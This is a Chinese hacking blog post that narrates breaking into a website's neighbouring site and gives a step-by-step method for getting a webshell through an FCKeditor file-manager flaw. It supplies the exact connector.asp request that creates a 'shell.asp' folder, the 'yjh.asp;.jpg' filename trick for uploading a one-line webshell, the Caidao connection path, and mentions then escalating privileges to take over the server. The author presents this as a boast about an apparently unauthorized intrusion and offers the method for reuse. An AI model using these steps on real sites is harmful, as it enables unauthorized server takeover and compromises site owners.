今天准备搞一个站，在此站搞了一翻后发现此站没有找到可利用的漏洞，此时就有点感觉蛋疼了，所以就想找个旁站来提权，扫描了一下旁站 我靠没有几个站点，后来在经过一翻努力下，终于还是登录进了一个站的后台，在后台瞧了一会，发现是FCK编辑器，哈 有点希望了，马上想到用FCK的突破建立文件夹的漏洞试下。下面就写下FCK突破建立文件夹后台拿shell方法，这个百度里面有很多这样的教程，现在我还是稍微详细的写一篇吧。

找了个添加新闻的地方，点击上传图片→浏览服务器，如下图：

然后新建一个文件夹，命名为 qxz.asp 如下图：

但是被自动命名变成了 qxz_asp 如下图：

下面我们就要用到绕过代码来突破了，代码如下：

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

把上面的代码加在网站链接后面，按下回车。如：http://www.xxx.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

OK成功

然后关掉此页面，再次点击添加图片 浏览服务器。自动创建了一个 shell.asp 的文件夹

然后把一句话改名为 yjh.asp;.jpg 上传一句话马到此文件夹中。

OK菜刀链接地址 http://www.xxx.com/Upload/image/shell.asp/yjh_asp;.jpg

最后上大马，经过一翻提权战斗，终于拿下了这台服务器，天色不早了，提权过程就不写了。

原创文章转载请注明：转载自 七行者博客

本文固定链接: https://www.qxzxp.com/3961.html